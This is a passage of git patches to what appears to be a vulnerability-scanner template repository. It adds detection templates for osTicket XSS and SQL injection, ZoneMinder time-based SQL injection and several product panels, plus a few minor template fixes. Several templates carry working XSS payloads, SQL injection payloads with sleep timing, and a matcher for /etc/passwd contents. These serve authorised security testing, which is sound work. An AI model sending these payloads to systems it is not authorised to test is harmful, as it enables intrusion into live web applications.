Content-Type: application/x-www-form-urlencoded + + __CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1 + + - | + GET /ajax.php/form/help-topic/1?a934f512c6644b03=&message=dgh7r%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20qavj5 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "dgh7r onmouseover=alert(document.domain) style=position:")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and From 86b6be6a28ad2edec3c841b0187090583bc18a9e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Oct 2024 11:39:29 +0400 Subject: [PATCH 045/218] Create CVE-2018-7196.yaml --- http/cves/2018/CVE-2018-7196.yaml | 72 +++++++++++++++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 http/cves/2018/CVE-2018-7196.yaml diff --git a/http/cves/2018/CVE-2018-7196.yaml b/http/cves/2018/CVE-2018-7196.yaml new file mode 100644 index 0000000000..ae616b921e --- /dev/null +++ b/http/cves/2018/CVE-2018-7196.yaml @@ -0,0 +1,72 @@ +id: CVE-2018-7196 + +info: + name: osTicket < 1.10.2 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "sort" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade osTicket to later version to mitigate this vulnerability. + reference: + - https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c + - https://nvd.nist.gov/vuln/detail/CVE-2018-7196 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-7196 + cwe-id: CWE-79 + cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: osticket + product: osticket + shodan-query: title:"osTicket" + fofa-query: title="osticket" + google-query: intitle:"osticket" + tags: cve,cve2018,osticket,xss,authenticated + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /scp/login.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(tolower(body), "osticket")' + internal: true + + extractors: + - type: regex + name: csrftoken + part: body + group: 1 + regex: + - '__CSRFToken__" value="(.*?)"' + internal: true + + - raw: + - | + POST /scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1 + + - | + GET /scp/index.php?sort=">&dir=1 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "\">")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and From cae8863432a414d4e3830a36b98a3a485a9ce180 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Oct 2024 11:40:32 +0400 Subject: [PATCH 046/218] Create CVE-2018-7193.yaml --- http/cves/2018/CVE-2018-7193.yaml | 74 +++++++++++++++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 http/cves/2018/CVE-2018-7193.yaml diff --git a/http/cves/2018/CVE-2018-7193.yaml b/http/cves/2018/CVE-2018-7193.yaml new file mode 100644 index 0000000000..86291ae827 --- /dev/null +++ b/http/cves/2018/CVE-2018-7193.yaml @@ -0,0 +1,74 @@ +id: CVE-2018-7193 + +info: + name: osTicket < 1.10.2 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in /scp/directory.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "order" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade osTicket to later version to mitigate this vulnerability. + reference: + - https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c + - https://nvd.nist.gov/vuln/detail/CVE-2018-7193 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-7193 + cwe-id: CWE-79 + epss-score: 0.00172 + epss-percentile: 0.54693 + cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: osticket + product: osticket + shodan-query: title:"osTicket" + fofa-query: title="osticket" + google-query: intitle:"osticket" + tags: cve,cve2018,osticket,xss,authenticated + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /scp/login.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(tolower(body), "osticket")' + internal: true + + extractors: + - type: regex + name: csrftoken + part: body + group: 1 + regex: + - '__CSRFToken__" value="(.*?)"' + internal: true + + - raw: + - | + POST /scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1 + + - | + GET /scp/directory.php?&&order=">&sort=dept HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "\">")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and From 6bdc4b12fba413942d03ba2586edeb7382811af2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Oct 2024 11:41:36 +0400 Subject: [PATCH 047/218] Create CVE-2023-1315.yaml --- http/cves/2023/CVE-2023-1315.yaml | 80 +++++++++++++++++++++++++++++++ 1 file changed, 80 insertions(+) create mode 100644 http/cves/2023/CVE-2023-1315.yaml diff --git a/http/cves/2023/CVE-2023-1315.yaml b/http/cves/2023/CVE-2023-1315.yaml new file mode 100644 index 0000000000..577adea4dc --- /dev/null +++ b/http/cves/2023/CVE-2023-1315.yaml @@ -0,0 +1,80 @@ +id: CVE-2023-1315 + +info: + name: osTicket < v1.16.6 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade osTicket to later version to mitigate this vulnerability. + reference: + - https://huntr.com/bounties/70a7fd8c-7e6f-4a43-9f8c-163b8967b16e + - https://nvd.nist.gov/vuln/detail/CVE-2023-1315 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-1315 + cwe-id: CWE-79 + epss-score: 0.00058 + epss-percentile: 0.25661 + cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: osticket + product: osticket + shodan-query: title:"osTicket" + fofa-query: title="osticket" + google-query: intitle:"osticket" + tags: cve,cve2023,osticket,xss,authenticated + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /scp/login.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(tolower(body), "osticket")' + internal: true + + extractors: + - type: regex + name: csrftoken + part: body + group: 1 + regex: + - '__CSRFToken__" value="(.*?)"' + internal: true + + - raw: + - | + POST /scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1 + + - | + GET /{{path}} HTTP/1.1 + Host: {{Hostname}} + + payloads: + path: + - scp/ajax.php/tickets/search?parent_id=1">\"/onload=confirm()//", "\">")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and From ed8d2fb0a54cb78b46e151d082c6714e46f65267 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Oct 2024 11:42:39 +0400 Subject: [PATCH 048/218] Create CVE-2023-1317.yaml --- http/cves/2023/CVE-2023-1317.yaml | 74 +++++++++++++++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 http/cves/2023/CVE-2023-1317.yaml diff --git a/http/cves/2023/CVE-2023-1317.yaml b/http/cves/2023/CVE-2023-1317.yaml new file mode 100644 index 0000000000..6d86cee1f2 --- /dev/null +++ b/http/cves/2023/CVE-2023-1317.yaml @@ -0,0 +1,74 @@ +id: CVE-2023-1317 + +info: + name: osTicket < v1.16.6 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade osTicket to later version to mitigate this vulnerability. + reference: + - https://huntr.com/bounties/c3e27af2-358b-490b-9baf-e451663e4e5f + - https://nvd.nist.gov/vuln/detail/CVE-2023-1317 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-1317 + cwe-id: CWE-79 + epss-score: 0.00058 + epss-percentile: 0.25661 + cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: osticket + product: osticket + shodan-query: title:"osTicket" + fofa-query: title="osticket" + google-query: intitle:"osticket" + tags: cve,cve2023,osticket,xss,authenticated + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /scp/login.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(tolower(body), "osticket")' + internal: true + + extractors: + - type: regex + name: csrftoken + part: body + group: 1 + regex: + - '__CSRFToken__" value="(.*?)"' + internal: true + + - raw: + - | + POST /scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1 + + - | + GET /scp/ajax.php/orgs/search?q=osTicket%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and From 0c0a7d462bf16657099ec842546301b7f1b35609 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Oct 2024 11:43:19 +0400 Subject: [PATCH 049/218] Create CVE-2023-1318.yaml --- http/cves/2023/CVE-2023-1318.yaml | 83 +++++++++++++++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 http/cves/2023/CVE-2023-1318.yaml diff --git a/http/cves/2023/CVE-2023-1318.yaml b/http/cves/2023/CVE-2023-1318.yaml new file mode 100644 index 0000000000..a7b0c1a500 --- /dev/null +++ b/http/cves/2023/CVE-2023-1318.yaml @@ -0,0 +1,83 @@ +id: CVE-2023-1318 + +info: + name: osTicket < v1.16.6 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross-site Scripting (XSS) - Generic in GitHub repository osticket/osticket prior to v1.16.6. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade osTicket to later version to mitigate this vulnerability. + reference: + - https://huntr.com/bounties/e58b38e0-4897-4bb0-84e8-a7ad8efab338 + - https://nvd.nist.gov/vuln/detail/CVE-2023-1318 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-1318 + cwe-id: CWE-79 + epss-score: 0.00058 + epss-percentile: 0.25661 + cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* + metadata: + max-request: 7 + vendor: osticket + product: osticket + shodan-query: title:"osTicket" + fofa-query: title="osticket" + google-query: intitle:"osticket" + tags: cve,cve2023,osticket,xss,authenticated + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /scp/login.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(tolower(body), "osticket")' + internal: true + + extractors: + - type: regex + name: csrftoken + part: body + group: 1 + regex: + - '__CSRFToken__" value="(.*?)"' + internal: true + + - raw: + - | + POST /scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1 + + - | + GET /{{path}} HTTP/1.1 + Host: {{Hostname}} + + payloads: + path: + - scp/ajax.php/queue/condition/addProperty?prop=background-colorvximw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3edhvmt&condition=1001 + - scp/ajax.php/queue/condition/addProperty?prop=color&condition=1001ljos2%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Emui2bt(document.domain)%3C%2fscript%3Edhvmt + - scp/ajax.php/queue/condition/add?field=isassigned&object_id=9&id=1001lr5is%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euoq07 + - scp/ajax.php/staff/change-departmenthpwc8%22%3e%3cscript%3ealert(document.domain)%3c/script%3em7dak + - scp/ajax.php/kb/faq/1/accessmztvw%22%3e%3cscript%3ealert(document.domain)%3c/script%3ez2p1d + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'contains(body, ">")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and From 4b9ec66fb5028ba07f2305b9dc4e08b2b13fd34a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Oct 2024 12:04:27 +0400 Subject: [PATCH 050/218] Create CVE-2021-45811.yaml --- http/cves/2021/CVE-2021-45811.yaml | 67 ++++++++++++++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 http/cves/2021/CVE-2021-45811.yaml diff --git a/http/cves/2021/CVE-2021-45811.yaml b/http/cves/2021/CVE-2021-45811.yaml new file mode 100644 index 0000000000..2743737d6a --- /dev/null +++ b/http/cves/2021/CVE-2021-45811.yaml @@ -0,0 +1,67 @@ +id: CVE-2021-45811 + +info: + name: osTicket 1.15.x - SQL Injection + author: ritikchaddha + severity: medium + description: | + A SQL injection vulnerability in the "Search" functionality of "tickets.php" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the "keywords" and "topic_id" URL parameters combination. + remediation: | + Upgrade osTicket to later version to mitigate this vulnerability. + reference: + - https://members.backbox.org/osticket-sql-injection/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-45811 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2021-45811 + cwe-id: CWE-89 + cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: osticket + product: osticket + shodan-query: title:"osTicket" + fofa-query: title="osticket" + google-query: intitle:"osticket" + tags: cve,cve2021,osticket,sqli,authenticated + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /scp/login.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(tolower(body), "osticket")' + internal: true + + extractors: + - type: regex + name: csrftoken + part: body + group: 1 + regex: + - '__CSRFToken__" value="(.*?)"' + internal: true + + - raw: + - | + POST /scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1 + + - | + GET /tickets.php?a=search&keywords=text'+:1&topic_id=topic_id_val HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - contains_all(body_2, "FROM (SELECT", "topic_id_val\'\' IN NATURAL", "ORDER BY relevance") From c5baa35a9c7cc03931f30b514c6db746f3717ce0 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 10 Oct 2024 16:48:07 +0300 Subject: [PATCH 051/218] add CVE-2024-43360 --- http/cves/2024/CVE-2024-43360.yaml | 43 ++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/cves/2024/CVE-2024-43360.yaml diff --git a/http/cves/2024/CVE-2024-43360.yaml b/http/cves/2024/CVE-2024-43360.yaml new file mode 100644 index 0000000000..f028b58c5b --- /dev/null +++ b/http/cves/2024/CVE-2024-43360.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-43360 + +info: + name: ZoneMinder - SQL Injection + author: s4e-io + severity: critical + description: | + ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61. + reference: + - https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-9cmr-7437-v9fj + - https://cvefeed.io/vuln/detail/CVE-2024-43360 + - https://medium.com/techpioneers/cve-2024-43360-in-depth-analysis-and-implications-for-security-75ceccc746b4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43360 + cwe-id: CWE-89 + epss-score: 0.00068 + epss-percentile: 0.30893 + cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: zoneminder + product: zoneminder + fofa-query: icon_hash="-1218152116" + tags: cve,cve2024,zoneminder,sqli + +http: + - raw: + - | + @timeout 20s + GET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains(body,"result\":\"Ok")' + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and From 152d30fbca1f71f651eee2d7e42016fff49aac0f Mon Sep 17 00:00:00 2001 From: Rishi Date: Thu, 10 Oct 2024 19:25:38 +0100 Subject: [PATCH 052/218] mirth-detection --- http/technologies/mirth-connect-detect.yaml | 30 +++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/technologies/mirth-connect-detect.yaml diff --git a/http/technologies/mirth-connect-detect.yaml b/http/technologies/mirth-connect-detect.yaml new file mode 100644 index 0000000000..d46279db80 --- /dev/null +++ b/http/technologies/mirth-connect-detect.yaml @@ -0,0 +1,30 @@ +id: mirth-connect-detect + +info: + name: Mirth Connect Administrator Detection + description: Detects Mirth Connect Administrator + author: rxerium + severity: info + metadata: + verified: true + max-request: 2 + product: mirth_connect + shodan-query: + - title:"mirth connect administrator" + tags: mirth-connect + + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Mirth Connect Administrator" + + - type: status + status: + - 200 \ No newline at end of file From 3fec9985693809ad404ed566b6fca70f1f6cbaee Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Oct 2024 13:08:23 +0530 Subject: [PATCH 053/218] Update ssh-default-logins.yaml (port update) --- javascript/default-logins/ssh-default-logins.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/default-logins/ssh-default-logins.yaml b/javascript/default-logins/ssh-default-logins.yaml index ef95c76596..d93c2b607a 100644 --- a/javascript/default-logins/ssh-default-logins.yaml +++ b/javascript/default-logins/ssh-default-logins.yaml @@ -6,7 +6,7 @@ info: severity: critical metadata: max-request: 223 - shodan-query: port:1433 + shodan-query: port:22 tags: js,ssh,default-login,network,fuzz javascript: @@ -37,4 +37,4 @@ javascript: - "response == true" - "success == true" condition: and -# digest: 4a0a00473045022014aa9c1a1b17b3914b4ba3f3233452eebae9a55538d97c0e80eda65e1d207f4d022100bb2595041170eae66cc6dd5fcbf9b33a0b3d61a92fe5a77c1aa48a600f8f420c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022014aa9c1a1b17b3914b4ba3f3233452eebae9a55538d97c0e80eda65e1d207f4d022100bb2595041170eae66cc6dd5fcbf9b33a0b3d61a92fe5a77c1aa48a600f8f420c:922c64590222798bb761d5b6d8e72950 From ed8e543886ead8e3cd1109b15704beef38d825cd Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 11 Oct 2024 15:22:52 +0300 Subject: [PATCH 054/218] add txadmin --- http/exposed-panels/txadmin-panel.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/exposed-panels/txadmin-panel.yaml diff --git a/http/exposed-panels/txadmin-panel.yaml b/http/exposed-panels/txadmin-panel.yaml new file mode 100644 index 0000000000..77dade9f4f --- /dev/null +++ b/http/exposed-panels/txadmin-panel.yaml @@ -0,0 +1,25 @@ +id: txadmin-panel + +info: + name: txAdmin Panel - Detect + author: s4e-io + severity: info + description: | + txAdmin panel was discovered. + metadata: + verified: true + max-request: 1 + fofa-query: title="txAdmin Login" + tags: panel,login,txadmin,detect + +http: + - method: GET + path: + - "{{BaseURL}}/auth" + + matchers: + - type: dsl + dsl: + - 'contains_any(body, "txAdmin Login", "txAdmin Logo")' + - 'status_code == 200' + condition: and From fa5b7894d2d9ca9f4729b17129f4b00ed93daa56 Mon Sep 17 00:00:00 2001 From: ola456 Date: Fri, 11 Oct 2024 20:31:30 +0200 Subject: [PATCH 055/218] Update CVE-2013-7091.yaml --- http/cves/2013/CVE-2013-7091.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 506c1e58dd..eaac3b1836 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -61,5 +61,5 @@ http: - type: regex regex: - - "root=.*:0:0" -# digest: 4a0a0047304502201b7a6938b4ba249a10fc7db131b554a3a5d026eea84f0c017f906046552a884c022100d7fc5da079a0e863422c5d15ac03bc2118e7a68415cc1181fa9d1b87ca1da794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - "root:.*:0:0:" +# digest: 4a0a0047304502201b7a6938b4ba249a10fc7db131b554a3a5d026eea84f0c017f906046552a884c022100d7fc5da079a0e863422c5d15ac03bc2118e7a68415cc1181fa9d1b87ca1da794:922c64590222798bb761d5b6d8e72950 From 84058eb40249b1cd216bc1b2f34dcdd5314e531c Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Sat, 12 Oct 2024 13:37:21 +0300 Subject: [PATCH 056/218] add traccar panel --- http/exposed-panels/traccar-panel.yaml | 27 ++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/traccar-panel.yaml diff --git a/http/exposed-panels/traccar-panel.yaml b/http/exposed-panels/traccar-panel.yaml new file mode 100644 index 0000000000..c13cae2715 --- /dev/null +++ b/http/exposed-panels/traccar-panel.yaml @@ -0,0 +1,27 @@ +id: traccar-panel + +info: + name: Traccar Panel - Detect + author: s4e-io + severity: info + description: | + Traccar panel was discovered. + metadata: + verified: true + max-request: 1 + fofa-query: app="Traccar" + shodan-query: html:"Traccar" + tags: panel,login,traccar,detect + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'contains_any(body, "Traccar", "Traccar GPS Tracking System")' + - 'status_code == 200' + condition: and From ca42c4e4bad83b8b8c682ff95a0337cb1d98272e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=88=91=E4=BC=9A=E5=95=8AD=2C=E6=98=8E=E5=B0=8F=E5=AD=90?= =?UTF-8?q?=2C=E5=BE=A1=E5=89=91?= <104293903+pwnhxl@users.noreply.github.com> Date: Sun, 13 Oct 2024 08:15:08 +0800 Subject: [PATCH 057/218] Update CVE-2019-7139.yaml --- http/cves/2019/CVE-2019-7139.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index 6d805e6ae3..d18d5ebbe1 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -55,7 +55,7 @@ http: - raw: - | @timeout: 20s - GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1 + GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((8)))a)%3d1+--+- HTTP/1.1 Host: {{Hostname}} - | @@ -72,7 +72,7 @@ http: - type: dsl name: time-based dsl: - - 'duration_1>=6' + - 'duration_1>=8' - 'contains(content_type_1, "application/json")' condition: and @@ -83,4 +83,4 @@ http: - 'status_code_2 == 200 && status_code_3 == 400' - 'len(body_2) == 2 && len(body_3) == 2' condition: and -# digest: 4a0a0047304502205a69b6ef9b1728b6a46cb23445d714f64558e680f3e39937cb4d3800f7c59669022100f12e75e00939482a564c76ed2fdcc3b2319eccdce9539afd2805c5a4353a4a35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a69b6ef9b1728b6a46cb23445d714f64558e680f3e39937cb4d3800f7c59669022100f12e75e00939482a564c76ed2fdcc3b2319eccdce9539afd2805c5a4353a4a35:922c64590222798bb761d5b6d8e72950 From b4099875a984ebae3f5bdaaddd3b78df2dfb30a9 Mon Sep 17 00:00:00 2001 From: ghost Date: Sun, 13 Oct 2024 00:24:15 +0000 Subject: [PATCH 058/218] =?UTF-8?q?chore:=20update=20WordPress=20Plugins?= =?UTF-8?q?=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../plugins/advanced-custom-fields.txt | 2 +- .../plugins/advanced-custom-fields.yaml | 2 +- .../wordpress/plugins/burst-statistics.yaml | 48 +++++++++++++++++++ 3 files changed, 50 insertions(+), 2 deletions(-) create mode 100644 http/technologies/wordpress/plugins/burst-statistics.yaml diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt index efb9c6b832..d90094695c 100644 --- a/helpers/wordpress/plugins/advanced-custom-fields.txt +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -1 +1 @@ -6.3.6.1 \ No newline at end of file +6.3.6.2 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..1f02455962 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -1,7 +1,7 @@ id: wordpress-advanced-custom-fields info: - name: Advanced Custom Fields (ACF) Detection + name: Secure Custom Fields Detection author: ricardomaia severity: info reference: diff --git a/http/technologies/wordpress/plugins/burst-statistics.yaml b/http/technologies/wordpress/plugins/burst-statistics.yaml new file mode 100644 index 0000000000..055268ad8f --- /dev/null +++ b/http/technologies/wordpress/plugins/burst-statistics.yaml @@ -0,0 +1,48 @@ +id: wordpress-burst-statistics + +info: + name: Burst Statistics – Privacy-Friendly Analytics for WordPress Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/burst-statistics/ + metadata: + plugin_namespace: burst-statistics + wpscan: https://wpscan.com/plugin/burst-statistics + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/burst-statistics/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/burst-statistics.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' From 4c9c690fcfbcdf15a756d53569919bb86223603c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 13 Oct 2024 19:34:44 +0530 Subject: [PATCH 059/218] Update mirth-connect-detect.yaml --- http/technologies/mirth-connect-detect.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/technologies/mirth-connect-detect.yaml b/http/technologies/mirth-connect-detect.yaml index d46279db80..8a2126e02c 100644 --- a/http/technologies/mirth-connect-detect.yaml +++ b/http/technologies/mirth-connect-detect.yaml @@ -2,15 +2,15 @@ id: mirth-connect-detect info: name: Mirth Connect Administrator Detection - description: Detects Mirth Connect Administrator author: rxerium severity: info + description: | + Detects Mirth Connect Administrator metadata: verified: true - max-request: 2 + max-request: 1 product: mirth_connect - shodan-query: - - title:"mirth connect administrator" + shodan-query: title:"mirth connect administrator" tags: mirth-connect @@ -22,9 +22,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Mirth Connect Administrator" - 